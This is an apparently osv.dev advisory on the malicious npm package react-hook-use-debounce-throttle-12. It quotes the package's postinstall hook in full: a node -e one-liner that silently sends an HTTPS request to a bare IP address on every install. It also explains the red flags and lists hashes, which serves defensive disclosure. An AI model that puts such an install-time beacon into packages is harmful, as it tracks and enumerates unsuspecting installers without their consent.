MAL-2026-5909
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/react-hook-use-debounce-throttle-12/MAL-2026-5909.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-5909
- Published
- 2026-06-16T17:24:02Z
- Modified
- 2026-06-16T23:16:56.517931088Z
- Summary
- Malicious code in react-hook-use-debounce-throttle-12 (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (b0a4d8a0470a3e7fcb2da7cdb29ba6412125924a486aa6f4a437ccfbeb5ca4af)
package.json declares a postinstall hook that runs
node -eto issue an HTTPS request to the bare IP 8.140.205.78 on port 80 with all errors silently swallowed:require('https').request({hostname:'8.140.205.78',port:80,path:'/',method:'GET',timeout:3000}).on('error',function(){}).end(). The package advertises itself as a React debounce/throttle hooks library and has no legitimate need for network activity at install time. The destination is a bare IPv4 address with no TLS, no publisher correlation, and no documented purpose; the request fires unconditionally on everynpm install, leaking the installer's IP, install timing, and machine footprint to the operator of that host. Author metadata is a generic placeholder (dev-utils <dev@utils-lib.dev>) with a repository URL that does not resolve to a real project, and the package name carries a numeric suffix consistent with disposable republishes. The combination of an install-time beacon to attacker-controlled infrastructure, mismatched purpose, silent error handling, and placeholder publisher identity is a victim-enumeration/install-tracking attack. - Database specific
{ "malicious-packages-origins": [ { "sha256": "f7491b25e457c908dae1b32fe800f461843e4463807c8590044e4b7cc769843a", "source": "amazon-inspector", "modified_time": "2026-06-16T17:24:02Z", "id": "IN-MAL-2026-006801", "versions": [ "1.0.0" ], "import_time": "2026-06-16T18:10:21.109051992Z" }, { "sha256": "882aa89fb511fb5cfe781f6b4242ae72abb1d089ec9b619056341a5f244183e2", "source": "amazon-inspector", "modified_time": "2026-06-16T22:30:57Z", "versions": [ "1.0.2" ], "id": "IN-MAL-2026-006852", "import_time": "2026-06-16T23:03:43.924049399Z" }, { "sha256": "b0a4d8a0470a3e7fcb2da7cdb29ba6412125924a486aa6f4a437ccfbeb5ca4af", "source": "amazon-inspector", "modified_time": "2026-06-16T22:30:59Z", "id": "IN-MAL-2026-006856", "versions": [ "1.0.1" ], "import_time": "2026-06-16T23:03:44.221726355Z" } ] }- References
- Credits
-
-
- Amazon Inspector - FINDER
-
Affected packages
npm / react-hook-use-debounce-throttle-12
Package
- Name
- react-hook-use-debounce-throttle-12
- View open source insights on deps.dev
- Purl
- pkg:npm/react-hook-use-debounce-throttle-12
Database specific
cwes
[
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
},
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
},
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
}
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/react-hook-use-debounce-throttle-12/MAL-2026-5909.json"
indicators
{
"evidence_files": [
{
"sha256": "2a569500b2facf7961423e147d69add31f30eb0c39f9740f8f6d95b38519e946",
"tlsh": "dc01f1b58460daa31fd495955d5a294ae6320c0f401c7c18e3d3803c87cd6ae687c6ae",
"path": "package.json"
}
],
"package_integrity": [
{
"hashes": {
"sha512_sri": "sha512-I5aCPxI0OkhvQfYyEnKGib+FWXhwHs0GxDpajWZjtlpS5EHNAJpYMRLr1LH8Veq8fQaqlu3Uly6rLXFLAELqEw==",
"sha1": "51385b702bfd7eb72ff1912ec3d19b3015cccb14"
},
"filename": "react-hook-use-debounce-throttle-12-1.0.0.tgz"
}
]
}